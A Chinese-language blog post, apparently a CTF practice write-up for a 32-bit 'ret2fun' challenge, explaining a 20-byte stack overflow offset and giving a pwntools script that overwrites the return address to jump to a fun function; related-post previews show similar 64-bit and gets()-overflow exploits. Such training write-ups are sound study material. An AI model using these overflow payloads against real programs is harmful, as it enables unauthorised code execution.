【青少年CTF】PWN-刷题记录-ret2fun

发表于2025-11-19|更新于2025-11-19|网络安全CTF青少年CTFPWN

|浏览量:

题目信息

题目名称：ret2fun

解题步骤

其实和ret2fun一样，但是没有栈对齐了，是32位

代码也一样，我就不贴了（其实应该先做这个题的）

fun地址为0x080484cd

在 32 位架构下，寄存器宽度为 4 字节（64 位为 8 字节）。根据题目逻辑，我们需要覆盖局部变量和 Saved EBP 才能控制返回地址。

$\text{Padding} = \text{Buffer} + \text{Saved EBP}$

Buffer: 16 bytes

Saved EBP: 4 bytes (32-bit width)

Total Offset: 20 bytes

from pwn import *

elf = context.binary = ELF('./pwn')
p = process(elf.path)

fun_addr = 0x080484cd

payload = b'A' * 20 + p32(fun_addr)

p.sendlineafter(b'please input:', payload)
p.interactive()

文章作者: 末心

文章链接: https://moxin1044.github.io/posts/804b/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源末心的小博客！

PWN 青少年CTF

相关推荐

【青少年CTF】PWN-刷题记录-ret2fun1

题目信息题目名称：ret2fun1 解题步骤可以看到开了很多东西，64位小端序，没有栈溢出保护，NX先默认可执行，没有随机地址入门小pwn 看到代码也是非常简单的利用gets进行栈溢出，然后返回到fun的system fun的地址是401156 gdb也挺方便 16 字节用于填充 s 缓冲区。 8 字节是 RBP 保存区域。所以，覆盖 RIP（返回地址）之前总共需要填充 24 字节。先简单写个脚本： 123456789101112from pwn import *elf = context.binary = ELF('./ret2fun')p = process(elf.path)fun_addr = 0x401156payload = b'A' * 24 + p64(fun_addr)p.sendlineafter(b'please input:', payload)p.interactive() 可以看到好像拿到了shell？但是真的拿到了吗？如拿！为什么这么说？我们执行一下命令，比如ls ...

【BUUCTF】PWN-刷题记录-test_your_nc

题目信息解题步骤 nc 连接后，可以直接执行命令，在此我们执行ls后看到了flag文件 cat flag 即可获得flag

【BUUCTF】PWN-刷题记录-rip

题目信息解题步骤程序是amd64、小端程序，GOT表在运行时仍然可写，存在GOT覆盖风险，没有栈保护,栈可执行、程序基地址固定使用ida进行分析：上述代码中，我们注意： 12char s[15]; // [rsp+1h] [rbp-Fh]gets(s, argv); s 数组大小为 15 字节，位于栈上。使用了危险函数 gets()：它会无限读取输入直到换行，完全不检查缓冲区边界。 gets(s) 会把你输入的所有字节写到栈上：先写入 s（15字节），接着覆盖 saved rbp（8字节），再覆盖 return address（8字节），后面跟着你继续写的字节都会保存在 return address 之后的栈上（函数返回时 ret 从栈上弹出的就是我们写入的返回地址）。 s 距离 rbp 仅 0xF = 15 字节，而 rbp 上方 8 字节是返回地址（return address）。因此，输入超过 15 + 8 = 23 字节即可覆盖返回地址。程序还有一个fun函数，调用了system函数，地址为0x401186 程序的system函数，地址为0...

【BUUCTF】PWN-刷题记录-warmup_csaw_2016

题目信息解题步骤和上一题基本一样 123456789101112int __fastcall main(int a1, char **a2, char **a3){ char s[64]; // [rsp+0h] [rbp-80h] BYREF _BYTE v5[64]; // [rsp+40h] [rbp-40h] BYREF write(1, "-Warm Up-\n", 0xAu); write(1, "WOW:", 4u); sprintf(s, "%p\n", sub_40060D); // sub_40060D中，调用system cat了flag write(1, s, 9u); write(1, ">", 1u); return gets(v5);} 1234int sub_40060D(){ return system("cat flag.txt");} v5 是输入缓冲区：gets(v5)，...

【BUUCTF】PWN-刷题记录-ciscn_2019_n_1

题目信息解题步骤 1234567[*] '/home/kali/Desktop/buuctf/ciscn_2019_n_1' Arch: amd64-64-little → 64位小端程序 RELRO: Partial RELRO → GOT表可写（可被劫持） Stack: No canary found → 无栈保护，可溢出 NX: NX enabled → 栈不可执行（不能直接执行shellcode） PIE: No PIE (0x400000) → 地址固定，无ASLR Stripped: No → 符号表未剥离，函数名可见用 IDA 打开二进制文件，main 函数非常简单：关键逻辑在 func()： v1[44]：输入缓冲区，位于 [rbp-0x30] v2：float 类型，位于 [rbp-0x4]，初始值 0.0 使用 gets(v1) → ...

数据加载中